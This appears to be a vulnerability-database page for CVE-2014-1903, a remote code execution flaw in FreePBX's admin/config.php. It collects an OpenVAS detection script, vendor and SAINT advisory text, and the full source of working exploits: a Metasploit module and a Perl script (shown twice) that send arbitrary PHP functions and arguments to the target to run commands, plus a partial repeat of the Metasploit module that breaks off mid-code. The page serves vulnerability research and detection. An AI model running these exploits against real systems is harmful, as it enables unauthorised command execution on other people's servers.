Search...

FreePBX 'admin/config.php' Remote Code Execution Vulnerability

2014-03-14T00:00:00

ID OPENVAS:1361412562310103920
Type openvas
Reporter This script is Copyright (C) 2014 Greenbone Networks GmbH
Modified 2018-10-12T00:00:00

Description

FreePBX is prone to a remote code-execution vulnerability.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_freepbx_65509.nasl 11867 2018-10-12 10:48:11Z cfischer $
#
# FreePBX 'admin/config.php' Remote Code Execution Vulnerability
#
# Authors:
# Michael Meyer &lt;michael.meyer@greenbone.net&gt;
#
# Copyright:
# Copyright (c) 2014 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:freepbx:freepbx";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103920");
  script_bugtraq_id(65509);
  script_cve_id("CVE-2014-1903");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_version("$Revision: 11867 $");
  script_name("FreePBX 'admin/config.php' Remote Code Execution Vulnerability");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/65509");
  script_xref(name:"URL", value:"http://freepbx.org");

  script_tag(name:"last_modification", value:"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $");
  script_tag(name:"creation_date", value:"2014-03-14 11:41:40 +0100 (Fri, 14 Mar 2014)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_copyright("This script is Copyright (C) 2014 Greenbone Networks GmbH");
  script_dependencies("gb_freepbx_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("freepbx/installed");

  script_tag(name:"impact", value:"Successfully exploiting this issue will allow attackers to execute
arbitrary code in the context of the affected application. Failed
exploit attempts may result in a denial-of-service condition.");
  script_tag(name:"vuldetect", value:"Try to execute a command with a sprecial crafted HTTP GET request.");
  script_tag(name:"insight", value:"admin/libraries/view.functions.php does not restrict
the set of functions accessible to the API handler, which allows
remote attackers to execute arbitrary PHP code via the function and
args parameters to admin/config.php.");
  script_tag(name:"solution", value:"Updates are available.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"summary", value:"FreePBX is prone to a remote code-execution vulnerability.");
  script_tag(name:"affected", value:"FreePBX versions 2.9, 2.10, 2.11, and 12 are vulnerable.");

  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");

if( ! port = get_app_port( cpe:CPE) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );
url = dir + '/admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id';

if( buf = http_vuln_check( port:port, url:url, pattern:'uid=[0-9]+.*gid=[0-9]+' ) )
{
  report = 'By requesting the url "' + url + '"\nscanner received the following response:\n\n' + buf + '\n';

  security_message(port:port, data:report);
  exit( 0 );
}

exit( 99 );

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310103920", "type": "openvas", "bulletinFamily": "scanner", "title": "FreePBX 'admin/config.php' Remote Code Execution Vulnerability", "description": "FreePBX is prone to a remote code-execution vulnerability.", "published": "2014-03-14T00:00:00", "modified": "2018-10-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103920", "reporter": "This script is Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/65509", "http://freepbx.org"], "cvelist": ["CVE-2014-1903"], "lastseen": "2019-05-29T18:37:35", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-1903"]}, {"type": "seebug", "idList": ["SSV:62027", "SSV:85513"]}, {"type": "exploitdb", "idList": ["EDB-ID:32512", "EDB-ID:32214"]}, {"type": "saint", "idList": ["SAINT:8B25D0B9043F412FEBFAAC119CBD87D3", "SAINT:39552A768A14F561C49AE81E9E058E30", "SAINT:FA4FCDE96D7598CC10207A31600CE243"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E375DCA3780649C7C0D812502C4FA983"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/FREEPBX_CONFIG_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125856"]}, {"type": "zdt", "idList": ["1337DAY-ID-22062"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30680"]}], "modified": "2019-05-29T18:37:35", "rev": 2}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-05-29T18:37:35", "rev": 2}, "vulnersScore": 9.1}, "pluginID": "1361412562310103920", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_freepbx_65509.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# FreePBX 'admin/config.php' Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:freepbx:freepbx\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103920\");\n script_bugtraq_id(65509);\n script_cve_id(\"CVE-2014-1903\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11867 $\");\n script_name(\"FreePBX 'admin/config.php' Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65509\");\n script_xref(name:\"URL\", value:\"http://freepbx.org\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-14 11:41:40 +0100 (Fri, 14 Mar 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_freepbx_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"freepbx/installed\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue will allow attackers to execute\narbitrary code in the context of the affected application. Failed\nexploit attempts may result in a denial-of-service condition.\");\n script_tag(name:\"vuldetect\", value:\"Try to execute a command with a sprecial crafted HTTP GET request.\");\n script_tag(name:\"insight\", value:\"admin/libraries/view.functions.php does not restrict\nthe set of functions accessible to the API handler, which allows\nremote attackers to execute arbitrary PHP code via the function and\nargs parameters to admin/config.php.\");\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"FreePBX is prone to a remote code-execution vulnerability.\");\n script_tag(name:\"affected\", value:\"FreePBX versions 2.9, 2.10, 2.11, and 12 are vulnerable.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\nurl = dir + '/admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id';\n\nif( buf = http_vuln_check( port:port, url:url, pattern:'uid=[0-9]+.*gid=[0-9]+' ) )\n{\n report = 'By requesting the url \"' + url + '\"\\nscanner received the following response:\\n\\n' + buf + '\\n';\n\n security_message(port:port, data:report);\n exit( 0 );\n}\n\nexit( 99 );\n\n", "naslFamily": "Web application abuses", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:14:27", "description": "admin/libraries/view.functions.php in FreePBX 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 does not restrict the set of functions accessible to the API handler, which allows remote attackers to execute arbitrary PHP code via the function and args parameters to admin/config.php.", "edition": 5, "cvss3": {}, "published": "2014-02-18T11:55:00", "title": "CVE-2014-1903", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1903"], "modified": "2019-12-10T16:01:00", "cpe": ["cpe:/a:freepbx:freepbx:2.11", "cpe:/a:freepbx:freepbx:2.10", "cpe:/a:freepbx:freepbx:2.12", "cpe:/a:sangoma:freepbx:2.9"], "id": "CVE-2014-1903", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:freepbx:freepbx:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:sangoma:freepbx:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:freepbx:freepbx:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:freepbx:freepbx:2.10:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "description": "Added: 04/03/2014 \nCVE: [CVE-2014-1903](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903>) \nBID: [65509](<http://www.securityfocus.com/bid/65509>) \nOSVDB: [103240](<http://www.osvdb.org/103240>) \n\n\n### Background\n\nFreePBX is an open source telephony front-end, which has an easy to use graphical user interface that controls and manages Asterisk. \n\n### Problem\n\nThe Framework module of FreePBX is vulnerable to remote code execution as a result of improper sanitization of user-supplied input. The vulnerability is triggered when input passed as arguments to the `**config.php**` script is not propery sanitized upon submission to the `**admin/libraries/view.functions.php**` script. FreePBX versions 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 are vulnerable. \n\n### Resolution\n\nUpgrade to version 2.9.0.14, 2.10.1.15, 2.11.0.23, 12.0.1alpha22, or higher. \n\n### References\n\n<http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice> \n<http://issues.freepbx.org/browse/FREEPBX-7123> \n<http://downloads.securityfocus.com/vulnerabilities/exploits/65509.php> \n\n\n### Limitations\n\nThe `**telnet**` application must exist on the target system. \n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2014-04-03T00:00:00", "published": "2014-04-03T00:00:00", "id": "SAINT:39552A768A14F561C49AE81E9E058E30", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/freepbx_config", "type": "saint", "title": "FreePBX Framework Module view.functions.php Remote Code Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "edition": 2, "description": "Added: 04/03/2014 \nCVE: [CVE-2014-1903](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903>) \nBID: [65509](<http://www.securityfocus.com/bid/65509>) \nOSVDB: [103240](<http://www.osvdb.org/103240>) \n\n\n### Background\n\nFreePBX is an open source telephony front-end, which has an easy to use graphical user interface that controls and manages Asterisk. \n\n### Problem\n\nThe Framework module of FreePBX is vulnerable to remote code execution as a result of improper sanitization of user-supplied input. The vulnerability is triggered when input passed as arguments to the `**config.php**` script is not propery sanitized upon submission to the `**admin/libraries/view.functions.php**` script. FreePBX versions 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 are vulnerable. \n\n### Resolution\n\nUpgrade to version 2.9.0.14, 2.10.1.15, 2.11.0.23, 12.0.1alpha22, or higher. \n\n### References\n\n<http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice> \n<http://issues.freepbx.org/browse/FREEPBX-7123> \n<http://downloads.securityfocus.com/vulnerabilities/exploits/65509.php> \n\n\n### Limitations\n\nThe `**telnet**` application must exist on the target system. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-04-03T00:00:00", "published": "2014-04-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/freepbx_config", "id": "SAINT:FA4FCDE96D7598CC10207A31600CE243", "type": "saint", "title": "FreePBX Framework Module view.functions.php Remote Code Execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "description": "Added: 04/03/2014 \nCVE: [CVE-2014-1903](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903>) \nBID: [65509](<http://www.securityfocus.com/bid/65509>) \nOSVDB: [103240](<http://www.osvdb.org/103240>) \n\n\n### Background\n\nFreePBX is an open source telephony front-end, which has an easy to use graphical user interface that controls and manages Asterisk. \n\n### Problem\n\nThe Framework module of FreePBX is vulnerable to remote code execution as a result of improper sanitization of user-supplied input. The vulnerability is triggered when input passed as arguments to the `**config.php**` script is not propery sanitized upon submission to the `**admin/libraries/view.functions.php**` script. FreePBX versions 2.9 before 2.9.0.14, 2.10 before 2.10.1.15, 2.11 before 2.11.0.23, and 12 before 12.0.1alpha22 are vulnerable. \n\n### Resolution\n\nUpgrade to version 2.9.0.14, 2.10.1.15, 2.11.0.23, 12.0.1alpha22, or higher. \n\n### References\n\n<http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice> \n<http://issues.freepbx.org/browse/FREEPBX-7123> \n<http://downloads.securityfocus.com/vulnerabilities/exploits/65509.php> \n\n\n### Limitations\n\nThe `**telnet**` application must exist on the target system. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2014-04-03T00:00:00", "published": "2014-04-03T00:00:00", "id": "SAINT:8B25D0B9043F412FEBFAAC119CBD87D3", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/freepbx_config", "title": "FreePBX Framework Module view.functions.php Remote Code Execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:26", "description": "", "published": "2014-03-25T00:00:00", "type": "packetstorm", "title": "FreePBX config.php Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-03-25T00:00:00", "id": "PACKETSTORM:125856", "href": "https://packetstormsecurity.com/files/125856/FreePBX-config.php-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"FreePBX config.php Remote Code Execution\", \n'Description' => %q{ \nThis module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11. \nIt's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\" \nparameters \"function\" and \"args\". \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'i-Hmx', # Vulnerability discovery \n'0x00string', # PoC \n'xistence <xistence[at]0x90.nl>' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-1903'], \n['OSVDB', '103240'], \n['EDB', '32214'], \n['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123'] \n], \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n['FreePBX', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 21 2014\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/']) \n], self.class) \n \nregister_advanced_options( \n[ \nOptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru']) \n], self.class) \nend \n \n \ndef check \nvprint_status(\"#{peer} - Trying to detect installed version\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"admin\", \"CHANGES\") \n}) \n \nif res and res.code == 200 and res.body =~ /^(.*)$/ \nversion = $1 \nelse \nreturn Exploit::CheckCode::Unknown \nend \n \nvprint_status(\"#{peer} - Version #{version} detected\") \n \nif version =~ /2\\.(9|10|11)\\.0/ \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nrand_data = rand_text_alpha_lower(rand(10) + 5) \n \nprint_status(\"#{peer} - Sending payload\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"admin\", \"config.php\"), \n'vars_get' => { \n\"display\" => rand_data, \n\"handler\" => \"api\", \n\"function\" => datastore['PHPFUNC'], \n\"args\" => payload.encoded \n} \n}) \n \n# If we don't get a 200 when we request our malicious payload, we suspect \n# we don't have a shell, either. \nif res and res.code != 200 \nprint_error(\"#{peer} - Unexpected response, exploit probably failed!\") \nend \n \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125856/freepbx_config_exec.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T13:30:14", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "FreePBX 2.11.0 - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85513", "id": "SSV:85513", "sourceData": "\n #!/usr/bin/perl\r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket::INET;\r\n\r\n# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution\r\n# Google Dork: n/a\r\n# Date: 2/25/14\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: http://www.freepbx.org/\r\n# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz\r\n# Version: 2.11 tested working\r\n# Tested on: Ubuntu 12.04, 13.10\r\n# CVE : CVE-2014-1903\r\n\r\n\r\n#\tReferences:\r\n#\thttp://seclists.org/bugtraq/2014/Feb/42\r\n#\thttp://issues.freepbx.org/browse/FREEPBX-7123\r\n#\thttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903\r\n#\r\n#\tDeveloper Advisory:\r\n#\thttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice\r\n\r\n\r\n\r\n# in /admin/config.php\r\n#\t// handle special requests\r\n#\tif (!isset($no_auth) && isset($_REQUEST['handler'])) {\r\n#\t\t$module = isset($_REQUEST['module'])\t? $_REQUEST['module']\t: '';\r\n#\t\t$file \t= isset($_REQUEST['file'])\t\t? $_REQUEST['file']\t\t: '';\r\n#\t\tfileRequestHandler($_REQUEST['handler'], $module, $file);\r\n#\t\texit();\r\n#\t}\r\n\r\n\r\n# in /admin/library/view.functions.php\r\n#\t case 'api':\r\n#\t if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {\r\n#\t $function = $_REQUEST['function'];\r\n#\t $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';\r\n#\t\r\n#\t //currently works for one arg functions, eventually need to clean this up to except more args\r\n#\t $result = $function($args);\r\n#\t $jr = json_encode($result);\r\n#\t } else {\r\n#\t $jr = json_encode(null);\r\n#\t }\r\n#\t header("Content-type: application/json");\r\n#\t echo $jr;\r\n#\t break;\r\n\r\n\r\n$| = 1;\r\n\r\nmy $sock = new IO::Socket::INET (\r\n PeerHost => $ARGV[0],\r\n PeerPort => '80',\r\n Proto => 'tcp',\r\n);\r\ndie "$!\\n" unless $sock;\r\nmy $func = $ARGV[1];\r\nmy $args = "";\r\nmy $i = 0;\r\nmy $max = 1;\r\nforeach(@ARGV) {\r\n\tif ($i > 1) {\r\n\t\t$args .= $_;\r\n\t}\r\n\tunless($i > (scalar(@ARGV) - 2)) {\r\n\t\t$args .= "%20";\r\n\t}\r\n\t$i++;\r\n}\r\nmy $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args;\r\nchomp($payload);\r\nprint "payload is " . $payload . "\\n";\r\nmy $packet = \t"GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\\r\\n\\r\\n";\r\nmy $size = $sock->send($packet);\r\nshutdown($sock, 1);\r\nmy $resp;\r\n$sock->recv($resp, 1024);\r\nprint $resp . "\\n";\r\n$sock->close();\r\nexit(0);\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85513", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:28:55", "description": "CVE ID:CVE-2014-1903\r\n\r\nFreePBX\u662f\u5f00\u6e90Web PBX\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nFreePBX admin/libraries/view.functions.php\u6ca1\u6709\u9650\u5236API\u5904\u7406\u7a0b\u5e8f\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\u96c6\uff0c\u8fd9\u53ef\u4f7f\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7 admin/config.php \u7684\u51fd\u6570\u548c\u53c2\u6570\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u4efb\u610fPHP\u4ee3\u7801\u3002\r\n0\r\nFreePBX 2.9\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice", "published": "2014-04-01T00:00:00", "title": "FreePBX Framework\u6a21\u5757admin/libraries/view.functions.php\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-04-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62027", "id": "SSV:62027", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFreePBX 2.11.0 - Remote Command Execution", "edition": 1, "published": "2014-03-12T00:00:00", "title": "FreePBX 2.11.0 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-03-12T00:00:00", "id": "EXPLOITPACK:E375DCA3780649C7C0D812502C4FA983", "href": "", "sourceData": "#!/usr/bin/perl\nuse strict;\nuse warnings;\nuse IO::Socket::INET;\n\n# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution\n# Google Dork: n/a\n# Date: 2/25/14\n# Exploit Author: @0x00string\n# Vendor Homepage: http://www.freepbx.org/\n# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz\n# Version: 2.11 tested working\n# Tested on: Ubuntu 12.04, 13.10\n# CVE : CVE-2014-1903\n\n\n#\tReferences:\n#\thttp://seclists.org/bugtraq/2014/Feb/42\n#\thttp://issues.freepbx.org/browse/FREEPBX-7123\n#\thttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903\n#\n#\tDeveloper Advisory:\n#\thttp://www.freepbx.org/news/2014-02-06/security-vulnerability-notice\n\n\n\n# in /admin/config.php\n#\t// handle special requests\n#\tif (!isset($no_auth) && isset($_REQUEST['handler'])) {\n#\t\t$module = isset($_REQUEST['module'])\t? $_REQUEST['module']\t: '';\n#\t\t$file \t= isset($_REQUEST['file'])\t\t? $_REQUEST['file']\t\t: '';\n#\t\tfileRequestHandler($_REQUEST['handler'], $module, $file);\n#\t\texit();\n#\t}\n\n\n# in /admin/library/view.functions.php\n#\t case 'api':\n#\t if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {\n#\t $function = $_REQUEST['function'];\n#\t $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';\n#\t\n#\t //currently works for one arg functions, eventually need to clean this up to except more args\n#\t $result = $function($args);\n#\t $jr = json_encode($result);\n#\t } else {\n#\t $jr = json_encode(null);\n#\t }\n#\t header(\"Content-type: application/json\");\n#\t echo $jr;\n#\t break;\n\n\n$| = 1;\n\nmy $sock = new IO::Socket::INET (\n PeerHost => $ARGV[0],\n PeerPort => '80',\n Proto => 'tcp',\n);\ndie \"$!\\n\" unless $sock;\nmy $func = $ARGV[1];\nmy $args = \"\";\nmy $i = 0;\nmy $max = 1;\nforeach(@ARGV) {\n\tif ($i > 1) {\n\t\t$args .= $_;\n\t}\n\tunless($i > (scalar(@ARGV) - 2)) {\n\t\t$args .= \"%20\";\n\t}\n\t$i++;\n}\nmy $payload = \"display=A&handler=api&file=A&module=A&function=\" . $func . \"&args=\" . $args;\nchomp($payload);\nprint \"payload is \" . $payload . \"\\n\";\nmy $packet = \t\"GET http://\" . $ARGV[0] . \"/admin/config.php?\" . $payload . \"\\r\\n\\r\\n\";\nmy $size = $sock->send($packet);\nshutdown($sock, 1);\nmy $resp;\n$sock->recv($resp, 1024);\nprint $resp . \"\\n\";\n$sock->close();\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T17:09:48", "description": "FreePBX config.php Remote Code Execution. CVE-2014-1903. Remote exploit for unix platform", "published": "2014-03-25T00:00:00", "type": "exploitdb", "title": "FreePBX config.php Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1903"], "modified": "2014-03-25T00:00:00", "id": "EDB-ID:32512", "href": "https://www.exploit-db.com/exploits/32512/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"FreePBX config.php Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.\r\n It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\"\r\n parameters \"function\" and \"args\".\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'i-Hmx', # Vulnerability discovery\r\n '0x00string', # PoC\r\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-1903'],\r\n ['OSVDB', '103240'],\r\n ['EDB', '32214'],\r\n ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']\r\n ],\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['FreePBX', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 21 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])\r\n ], self.class)\r\n end\r\n\r\n\r\n def check\r\n vprint_status(\"#{peer} - Trying to detect installed version\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"admin\", \"CHANGES\")\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /^(.*)$/\r\n version = $1\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n vprint_status(\"#{peer} - Version #{version} detected\")\r\n\r\n if version =~ /2\\.(9|10|11)\\.0/\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n rand_data = 